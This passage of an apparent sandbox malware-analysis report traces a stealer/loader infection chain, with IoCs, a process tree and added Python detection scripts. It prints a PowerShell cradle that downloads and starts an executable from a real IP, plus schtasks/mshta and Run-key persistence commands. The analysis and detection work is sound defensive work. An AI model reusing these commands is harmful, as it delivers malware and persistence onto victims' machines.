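    ("SetValue", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath", r"System32\Drivers\9e186137.sys", "46e716e8.exe"),
    ("CreateKey", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys", None, "46e716e8.exe"),
    ("SetValue", r"\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive", r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background", "explorer.exe"),
]

if __name__ == "__main__":
    for process, rule, detail in scan(REPORT_ROWS):
        print(f"{process:16} {rule:32} {detail}")
```

Two caveats on reading these rows: the sandbox records the attempted writes, not their effect, and on a host with Tamper Protection enabled the Defender policy and TamperProtection writes are blocked; and the writes landed under WOW6432Node, the 32-bit redirected view, so a hunt on live hosts should query both views rather than only the native Policies key.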
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Documents\desktop.ini | firefox.exe
File opened for modification | C:\Users\Public\desktop.ini | firefox.exe
File opened for modification | C:\Users\Public\Documents\desktop.ini | firefox.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\F: | 46e716e8.exe
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PHYSICALDRIVE0 | c606d285b9.exe
File opened for modification | \??\PhysicalDrive0 | 46e716e8.exe
The IoC is a writable handle on the raw disk; the report does not show what, if anything, was written. Confirm with a before/after image of sector 0 before classifying either process as a bootkit, since disk-scanning tools and some anti-VM disk-identity checks open the same device.
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x0007000000024408-1666.dat | autoit_exe
behavioral2/files/0x00020000000227b1-20983.dat | autoit_exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid | Process
4748 | tasklist.exe
1708 | tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid | Process
1896 | Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE
668 | rapes.exe
5900 | f4619e3a66.exe
1572 | 5c08298338.exe
4168 | rapes.exe
5096 | c606d285b9.exe
5568 | 04c5e61d92.exe
7420 | TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE
7476 | 483d2fa8a0d53818306efeb32d3.exe
8184 | rapes.exe
9172 | 02a203a317.exe
10056 | cdf48d376b.exe
10612 | e6e32e2403.exe
3564 | c96dd9ec4b.exe
9476 | c4f793a08b.exe
11636 | rapes.exe
Suspicious use of SetThreadContext 8 IoCs
description | pid | Process | procid_target
PID 5900 set thread context of 1944 | 5900 | f4619e3a66.exe | 112
PID 1572 set thread context of 3628 | 1572 | 5c08298338.exe | 113
PID 5568 set thread context of 4400 | 5568 | 04c5e61d92.exe | 120
PID 2816 set thread context of 2432 | 2816 | TbV75ZR.exe | 123
PID 4772 set thread context of 3648 | 4772 | hYjiwV0.exe | 133
PID 2904 set thread context of 5900 | 2904 | EPTwCQd.exe | 135
PID 6168 set thread context of 5204 | 6168 | 627d431241.exe | 215
PID 9476 set thread context of 8804 | 9476 | c4f793a08b.exe | 280
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | b2e2ac1.exe
File opened (read-only) | \??\VBoxMiniRdrDN | 46e716e8.exe
Drops file in Windows directory 15 IoCs
description | ioc | Process
File opened for modification | C:\Windows\LogisticsNotre, C:\Windows\WallpapersHo, C:\Windows\JenniferSubdivision, C:\Windows\BrandonStat, C:\Windows\PotteryUser, C:\Windows\ProvidingMilwaukee, C:\Windows\EstateLegislative, C:\Windows\CorrectionsGeographic, C:\Windows\RowTopics, C:\Windows\SpecificsHeaven, C:\Windows\DiscussedFacial, C:\Windows\EnglandDeleted, C:\Windows\GentleLogging | 7IIl2eE.exe
File created | C:\Windows\Tasks\rapes.job | Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE
File created | C:\Windows\Tasks\futors.job | amnew.exe
The two .job files are legacy scheduled-task definitions for the rapes.exe and futors.exe loaders, and pair with the schtasks.exe executions listed under "System Location Discovery" below.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid | pid_target | Process | procid_target
5704 | 2432 | WerFault.exe | 123
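The SetThreadContext rows, the NtCreateUserProcessOtherParentProcess row, the crash row and the Vidar memory hits all reference each other by PID, and the dropped-EXE table resolves most of those PIDs to image names. The Python below is an added example, not part of the report, that joins them: it parses the rows as they appear on this page and prints, for each injection, the source image, the resolved target and what later happened to that target. The only inputs are text copied from this report; the dropped-EXE list is reproduced in part, and PIDs absent from it (3648, 5204) are reported as unknown rather than guessed.

```python
import re

# Rows copied verbatim from this report's signature sections.
SET_THREAD_CONTEXT = (
    "PID 5900 set thread context of 1944 5900 f4619e3a66.exe 112 "
    "PID 1572 set thread context of 3628 1572 5c08298338.exe 113 "
    "PID 5568 set thread context of 4400 5568 04c5e61d92.exe 120 "
    "PID 2816 set thread context of 2432 2816 TbV75ZR.exe 123 "
    "PID 4772 set thread context of 3648 4772 hYjiwV0.exe 133 "
    "PID 2904 set thread context of 5900 2904 EPTwCQd.exe 135 "
    "PID 6168 set thread context of 5204 6168 627d431241.exe 215 "
    "PID 9476 set thread context of 8804 9476 c4f793a08b.exe 280"
)
OTHER_PARENT = "PID 2432 created 2956 2432 MSBuild.exe 50"
PROGRAM_CRASH = "5704 2432 WerFault.exe 123"
VIDAR_DUMPS = ("behavioral2/memory/3648-237-0x0000000000400000-0x0000000000429000"
               "-memory.dmp family_vidar_v7")
# Subset of the "Executes dropped EXE" table (pid Process pairs).
DROPPED_EXE = (
    "668 rapes.exe 5900 f4619e3a66.exe 1572 5c08298338.exe 1944 svchost015.exe "
    "3628 svchost015.exe 5568 04c5e61d92.exe 4400 svchost015.exe 2816 TbV75ZR.exe "
    "4772 hYjiwV0.exe 2904 EPTwCQd.exe 6168 627d431241.exe 9476 c4f793a08b.exe "
    "8804 svchost015.exe 3564 c96dd9ec4b.exe"
)


def pid_names():
    """pid -> image name, from the dropped-EXE table plus the one system
    binary (MSBuild.exe) named in the other-parent row."""
    names = {int(p): n for p, n in re.findall(r"(\d+) (\S+)", DROPPED_EXE)}
    for pid, image in re.findall(r"PID (\d+) created \d+ \1 (\S+)", OTHER_PARENT):
        names.setdefault(int(pid), image)
    return names


def injection_chains():
    """One dict per SetThreadContext row, with the target resolved and
    annotated from the other signatures."""
    names = pid_names()
    rows = re.findall(r"PID (\d+) set thread context of (\d+) \1 (\S+) \d+",
                      SET_THREAD_CONTEXT)
    injectors = {int(src) for src, _dst, _img in rows}
    spoofers = {int(p) for p in re.findall(r"PID (\d+) created \d+", OTHER_PARENT)}
    crashed = {int(t) for _w, t in re.findall(r"(\d+) (\d+) WerFault\.exe", PROGRAM_CRASH)}
    vidar = {int(p) for p in re.findall(r"memory/(\d+)-", VIDAR_DUMPS)}
    chains = []
    for src, dst, image in rows:
        src, dst = int(src), int(dst)
        notes = []
        if dst in vidar:
            notes.append("vidar payload found in target memory")
        if dst in spoofers:
            notes.append("target later created a child under another parent (PPID spoofing)")
        if dst in crashed:
            notes.append("target crashed (WerFault)")
        if dst in injectors:
            notes.append("target is itself an injector (nested hollowing)")
        chains.append({"source": image, "source_pid": src, "target_pid": dst,
                       "target": names.get(dst, "unknown (not in dropped-EXE list)"),
                       "notes": notes})
    return chains


if __name__ == "__main__":
    for c in injection_chains():
        print(f"{c['source']} ({c['source_pid']}) -> {c['target']} ({c['target_pid']})"
              + (": " + "; ".join(c["notes"]) if c["notes"] else ""))
```

The join shows three loaders (f4619e3a66.exe, 5c08298338.exe, 04c5e61d92.exe, c4f793a08b.exe) hollowing their own dropped svchost015.exe rather than the real svchost.exe, TbV75ZR.exe hollowing MSBuild.exe (which then spawned a child with a spoofed parent and crashed), hYjiwV0.exe writing the Vidar payload into pid 3648, and EPTwCQd.exe injecting into f4619e3a66.exe, an injector itself.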
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe (10 instances), CMD.exe, powershell.exe (6), findstr.exe (3), taskkill.exe (3), tasklist.exe (2), svchost015.exe (3), schtasks.exe (3), timeout.exe (2), mshta.exe (2), MSBuild.exe (2), Rm3cVPI.exe, e6e32e2403.exe, 46e716e8.exe, Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE, rapes.exe, b2e2ac1.exe, c96dd9ec4b.exe, 1204b818ae.exe, futors.exe, 5c08298338.exe, c4f793a08b.exe, 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe, 04c5e61d92.exe, 62b36023a0.exe, fontdrvhost.exe, extrac32.exe, f4619e3a66.exe, choice.exe, 7IIl2eE.exe, amnew.exe, TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE, 02a203a317.exe, Passwords.com, 483d2fa8a0d53818306efeb32d3.exe, cdf48d376b.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | 1204b818ae.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | 1204b818ae.exe
Most of these opens come from built-in utilities (cmd, findstr, tasklist, schtasks, timeout, choice, fontdrvhost) that touch the NLS key during normal locale initialisation, so the 64-IoC count overstates the behaviour; the one deliberate locale check visible here is the InstallLanguage query by 1204b818ae.exe, which pairs with the Geo\Nation lookups under "Checks computer location settings".
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | e6e32e2403.exe, MSBuild.exe, chrome.exe (2), msedge.exe, firefox.exe (7)
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | e6e32e2403.exe, MSBuild.exe, firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe, chrome.exe (2), firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe (7)
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
The browser entries are the browsers' own startup telemetry; the reads that matter for the stealer's hardware fingerprint are the ProcessorNameString queries by e6e32e2403.exe and by MSBuild.exe (the process hollowed by TbV75ZR.exe).
Delays execution with timeout.exe 2 IoCs
pid | Process
8932 | timeout.exe
13148 | timeout.exe
Enumerates system info in registry 2 TTPs 12 IoCs
All twelve reads come from chrome.exe and msedge.exe, the browsers that the injected MSBuild.exe started with --remote-debugging-port=9223 (see the process tree); they are the browsers' own hardware reads, not a check performed by the malware itself.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Kills process with taskkill 5 IoCs
pid | Process
1416 | taskkill.exe
11568 | taskkill.exe
8136 | taskkill.exe
4336 | taskkill.exe
9648 | taskkill.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877263501791517" | chrome.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings | firefox.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. In this run the task x48hHmafcSU re-runs mshta on C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta every 25 minutes under the Admin account (see the process tree), so the loader chain is re-executed even after the original dropper is gone; the task name and the .hta path are the artefacts to sweep for.
pid | Process
4296 | schtasks.exe
12788 | schtasks.exe
4764 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process | consecutive entries (64 in total, report order)
3760 | powershell.exe | 2
1896 | Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE | 2
668 | rapes.exe | 2
5900 | f4619e3a66.exe | 2
1572 | 5c08298338.exe | 2
4168 | rapes.exe | 2
4396 | Rm3cVPI.exe | 4
5096 | c606d285b9.exe | 2
5568 | 04c5e61d92.exe | 2
2432 | MSBuild.exe | 4
540 | fontdrvhost.exe | 4
3648 | MSBuild.exe | 2
5900 | MSBuild.exe | 4
3648 | MSBuild.exe | 2
5104 | chrome.exe | 2
3648 | MSBuild.exe | 2
4856 | Passwords.com | 6
5580 | powershell.exe | 3
3648 | MSBuild.exe | 4
5824 | powershell.exe | 3
13268 | powershell.exe | 3
7056 | powershell.exe | 3
6072 | powershell.exe | 2
Suspicious behavior: LoadsDriver 4 IoCs
pid | Process | entries
11784 | 46e716e8.exe | 4
Suspicious behavior: MapViewOfSection 3 IoCs
pid | Process | entries
5008 | u75a1_003.exe | 3
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid | Process | consecutive entries
5104 | chrome.exe | 4
5864 | msedge.exe | 2
12256 | chrome.exe | 4
13232 | msedge.exe | 2
Suspicious use of AdjustPrivilegeToken 64 IoCs
The 64 entries, in report order, grouped by process. The chrome.exe SeShutdownPrivilege/SeCreatePagefilePrivilege pairs and the SeDebugPrivilege requests by tasklist.exe and taskkill.exe are what those tools normally ask for; the process to look at first is 46e716e8.exe (PID 11784), which enables SeLoadDriverPrivilege, SeTcbPrivilege, SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege and is also the process behind the LoadsDriver signature above.
description | pid | Process
SeDebugPrivilege | 3760 | powershell.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege (alternating, 14 entries) | 5104 | chrome.exe
SeDebugPrivilege | 4748 | tasklist.exe
SeDebugPrivilege | 1708 | tasklist.exe
SeDebugPrivilege | 5580 | powershell.exe
SeDebugPrivilege | 5824 | powershell.exe
SeDebugPrivilege | 13268 | powershell.exe
SeDebugPrivilege | 7056 | powershell.exe
SeDebugPrivilege | 6072 | powershell.exe
SeDebugPrivilege | 1676 | powershell.exe
SeDebugPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeLoadDriverPrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeSecurityPrivilege | 11784 | 46e716e8.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege (alternating, 4 entries) | 12256 | chrome.exe
SeDebugPrivilege | 9648 | taskkill.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege (alternating, 4 entries) | 12256 | chrome.exe
SeDebugPrivilege | 1416 | taskkill.exe
SeShutdownPrivilege, SeCreatePagefilePrivilege | 12256 | chrome.exe
SeDebugPrivilege | 11568 | taskkill.exe
SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeSecurityPrivilege, SeCreatePermanentPrivilege, SeShutdownPrivilege, SeLoadDriverPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeSystemProfilePrivilege, SeDebugPrivilege, SeMachineAccountPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege | 11784 | 46e716e8.exe
SeDebugPrivilege | 8136 | taskkill.exe
SeLoadDriverPrivilege (2 entries) | 11784 | 46e716e8.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process | consecutive entries (64 in total, report order)
4332 | 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 3
5104 | chrome.exe | 26
4856 | Passwords.com | 3
5864 | msedge.exe | 1
5724 | 62b36023a0.exe | 3
12256 | chrome.exe | 26
9620 | 1204b818ae.exe | 2
Suspicious use of SendNotifyMessage 34 IoCs
pid | Process | consecutive entries (34 in total, report order)
4332 | 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 3
4856 | Passwords.com | 3
5724 | 62b36023a0.exe | 3
9620 | 1204b818ae.exe | 11
8628 | firefox.exe | 12
9620 | 1204b818ae.exe | 2
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
8628 | firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
The 64 entries collapsed to parent-to-child edges, in report order. Three writes per child is the baseline for a plain CreateProcess here; the nine writes each into 1944 and 3628 and the seven into 4400 are the exception, and those three children are the svchost015.exe processes in the tree below whose parents are flagged SetThreadContext and whose command line names the parent's own executable, a pattern consistent with process hollowing.
description | pid | Process | procid_target | entries
PID 4332 wrote to memory of 5564 | 4332 | 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 86 | 3
PID 4332 wrote to memory of 1708 | 4332 | 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 87 | 3
PID 5564 wrote to memory of 4296 | 5564 | cmd.exe | 89 | 3
PID 1708 wrote to memory of 3760 | 1708 | mshta.exe | 91 | 3
PID 3760 wrote to memory of 1896 | 3760 | powershell.exe | 100 | 3
PID 1896 wrote to memory of 668 | 1896 | Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE | 101 | 3
PID 668 wrote to memory of 4244 | 668 | rapes.exe | 105 | 3
PID 4244 wrote to memory of 4192 | 4244 | amnew.exe | 106 | 3
PID 668 wrote to memory of 5900 | 668 | rapes.exe | 107 | 3
PID 4192 wrote to memory of 1572 | 4192 | futors.exe | 108 | 3
PID 668 wrote to memory of 4396 | 668 | rapes.exe | 111 | 3
PID 5900 wrote to memory of 1944 | 5900 | f4619e3a66.exe | 112 | 9
PID 1572 wrote to memory of 3628 | 1572 | 5c08298338.exe | 113 | 9
PID 668 wrote to memory of 5096 | 668 | rapes.exe | 116 | 3
PID 4192 wrote to memory of 5568 | 4192 | futors.exe | 118 | 3
PID 5568 wrote to memory of 4400 | 5568 | 04c5e61d92.exe | 120 | 7
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
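The signatures in this report (a schtasks task whose action is mshta, a PowerShell one-liner that downloads and starts a file, chrome.exe and msedge.exe started with --remote-debugging-port=9223 by MSBuild.exe, and svchost015.exe children whose command line names a different executable) are all visible in process-creation telemetry, so they can be turned into rules. The Python below is an added example written for this page; it is not part of the sandbox report and not code from any of the malware families named above. The ProcEvent record layout and the rule heuristics are assumptions (modelled on Sysmon Event ID 1's Image, CommandLine and ParentImage fields), and the sample rows are constructed from the PIDs, image paths and command lines shown in this report's process tree.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (field layout is an assumption, not the report's format)."""
    pid: int
    image: str         # image path of the new process
    cmdline: str       # command line as logged
    parent_image: str  # image path of the creating process


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SCRIPT_HOSTS = {"mshta", "powershell", "pwsh", "wscript", "cscript", "rundll32", "regsvr32"}
CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
LAUNCH = re.compile(r"start-process|invoke-expression|\biex\b|invoke-item", re.I)
REMOTE_DBG = re.compile(r"--remote-debugging-(?:port|pipe)\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path with surrounding quotes removed."""
    return path.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def stem(name: str) -> str:
    """Drop a trailing .exe so 'schtasks' and 'schtasks.exe' compare equal."""
    return name[:-4] if name.endswith(".exe") else name


def cmdline_exe(cmdline: str) -> str:
    """Executable named by the first (possibly quoted) token of a command line."""
    cmd = cmdline.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        head = cmd[1:end] if end > 0 else cmd[1:]
    else:
        head = cmd.split(None, 1)[0] if cmd else ""
    return basename(head)


def rule_schtasks(ev: ProcEvent) -> bool:
    """schtasks /create whose /tr action starts a script host or a payload under Temp/AppData."""
    if basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
        return False
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', ev.cmdline, re.I)
    if not m:
        return False
    action = (m.group(1) or m.group(2)).lower()
    return (stem(cmdline_exe(action)) in SCRIPT_HOSTS
            or "\\appdata\\" in action or "\\temp\\" in action)


def rule_ps_cradle(ev: ProcEvent) -> bool:
    """PowerShell that downloads a file and runs it in the same command line."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return bool(CRADLE.search(ev.cmdline)) and bool(LAUNCH.search(ev.cmdline))


def rule_remote_debugging(ev: ProcEvent) -> bool:
    """A browser started with a DevTools remote-debugging switch by a non-browser parent."""
    return (basename(ev.image) in BROWSERS
            and bool(REMOTE_DBG.search(ev.cmdline))
            and basename(ev.parent_image) not in BROWSERS)


def rule_image_cmdline_mismatch(ev: ProcEvent) -> bool:
    """Image on disk differs from the executable the command line names (hollowing indicator)."""
    claimed = cmdline_exe(ev.cmdline)
    return bool(claimed) and stem(claimed) != stem(basename(ev.image))


RULES = [
    ("scheduled_task_script_host", rule_schtasks),
    ("powershell_download_cradle", rule_ps_cradle),
    ("browser_remote_debugging_from_non_browser", rule_remote_debugging),
    ("image_cmdline_mismatch", rule_image_cmdline_mismatch),
]


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule name) for every rule that fires on an event, in event order."""
    return [(ev.pid, name) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample rows: PIDs, paths and command lines taken from this report's process tree.
SAMPLE = [
    ProcEvent(4296, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /create /tn x48hHmafcSU /tr "mshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta" /sc minute /mo 25 /ru "Admin" /f',
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(3760, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
              r"C:\Windows\SysWOW64\mshta.exe"),
    ProcEvent(3628, r"C:\Users\Admin\AppData\Local\Temp\svchost015.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"',
              r"C:\Users\Admin\AppData\Local\Temp\10043950101\5c08298338.exe"),
    ProcEvent(5104, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"',
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    # Renderer child inherits the switch but is spawned by chrome.exe itself: must not fire.
    ProcEvent(4720, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9223 --lang=en-US',
              r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    # WOW64 path redirection: image and command line name the same file: must not fire.
    ProcEvent(540, r"C:\Windows\SysWOW64\fontdrvhost.exe",
              r'"C:\Windows\System32\fontdrvhost.exe"', r"C:\Windows\system32\sihost.exe"),
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE):
        print(f"pid {pid}: {rule}")
```

Running it yields four hits, PIDs 4296, 3760, 3628 and 5104, one per rule. The two negatives are deliberate: a renderer child also carries --remote-debugging-port=9223, so matching the switch alone would flag every chrome.exe child in the tree, and the WOW64-redirected fontdrvhost.exe shows why the hollowing check compares file names rather than full paths. The same four checks port directly to Sysmon Event ID 1 or any EDR process-start feed that records the parent image.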
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2956
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn x48hHmafcSU /tr "mshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn x48hHmafcSU /tr "mshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4296
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\InOfi6bWk.hta2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Users\Admin\AppData\Local\Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE"C:\Users\Admin\AppData\Local\Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
